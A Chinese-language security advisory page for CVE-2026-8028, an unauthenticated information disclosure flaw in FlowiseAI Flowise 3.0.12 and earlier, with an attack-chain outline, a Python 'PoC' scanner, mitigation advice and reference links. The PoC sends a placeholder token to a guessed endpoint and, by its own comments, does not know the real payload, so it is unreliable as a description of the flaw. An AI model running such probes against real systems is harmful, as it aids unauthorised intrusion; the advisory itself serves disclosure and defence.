CVE-2026-8028 CVSS 3.7 低危

CVE-2026-8028 FlowiseAI 信息披露漏洞

披露日期: 2026-05-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-8028

漏洞类型

信息泄露

CVSS评分

3.7 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

FlowiseAI Flowise

漏洞概述

FlowiseAI Flowise 3.0.12及之前版本存在信息披露漏洞。该漏洞源于`packages/server/src/enterprise/services/account.service.ts`文件中的`verify`函数处理不当。攻击者无需认证即可通过网络利用该漏洞，导致敏感信息泄露。尽管攻击复杂度较高，但已有公开利用代码，建议尽快升级。

技术细节

该漏洞位于FlowiseAI的Enterprise服务组件中，具体影响文件为`account.service.ts`的`verify`函数。在处理Endpoint组件的请求时，由于缺乏严格的输入验证或逻辑缺陷，攻击者可以构造特定的恶意请求操纵该函数。虽然攻击无需用户交互和权限认证，但由于系统机制的复杂性，利用难度被评估为较高。成功利用后，攻击者可以绕过某些安全检查获取敏感信息，造成机密性影响。目前该漏洞的利用代码已公开，增加了被攻击的风险。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别运行FlowiseAI Flowise 3.0.12或更早版本的目标系统。

STEP 2

2. 漏洞利用

攻击者向目标服务器的`account.service.ts`相关接口发送特制的恶意请求，操纵`verify`函数。

STEP 3

3. 信息获取

由于漏洞导致逻辑缺陷，服务器返回本应受保护的敏感信息，攻击者解析响应数据获取情报。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Vulnerability: CVE-2026-8028
# Target: FlowiseAI Flowise <= 3.0.12
# Description: Information disclosure in account.service.ts verify function

def check_vuln(url):
    # The vulnerable endpoint is likely related to account verification
    # Based on the file path: packages/server/src/enterprise/services/account.service.ts
    target_url = f"{url}/api/v1/enterprise/account/verify"
    
    headers = {
        "User-Agent": "CVE-2026-8028-Scanner",
        "Content-Type": "application/json"
    }
    
    # Payload attempting to trigger the information disclosure
    # Specific payload depends on the logic flaw in the verify function
    payload = {
        "token": "manipulated_data_to_trigger_leak"
    }
    
    try:
        response = requests.post(target_url, json=payload, headers=headers, timeout=10)
        
        # Check if response contains sensitive information or unexpected data leakage
        if response.status_code == 200 and "sensitive_data" in response.text:
            print(f"[+] Vulnerability detected at: {target_url}")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Vulnerability not detected or system patched.")
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")

if __name__ == "__main__":
    target = "http://localhost:3000" # Replace with actual target
    check_vuln(target)

影响范围

FlowiseAI Flowise <= 3.0.12

防御指南

临时缓解措施

建议立即升级至FlowiseAI Flowise 3.0.12之后的版本。如果无法立即升级，应通过网络边界设备限制对受影响端口的访问，仅允许内部IP访问，并密切监控系统日志中是否存在针对`verify`接口的异常访问行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8028
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8028
3 Details https://www.cvedetails.com/cve/CVE-2026-8028/
4 VulDB https://vuldb.com/cve/CVE-2026-8028
5 Link https://gist.github.com/YLChen-007/1d52497b0221835f99367be61612746b
6 Link https://vuldb.com/submit/777659
7 Link https://vuldb.com/vuln/361276
8 Link https://vuldb.com/vuln/361276/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表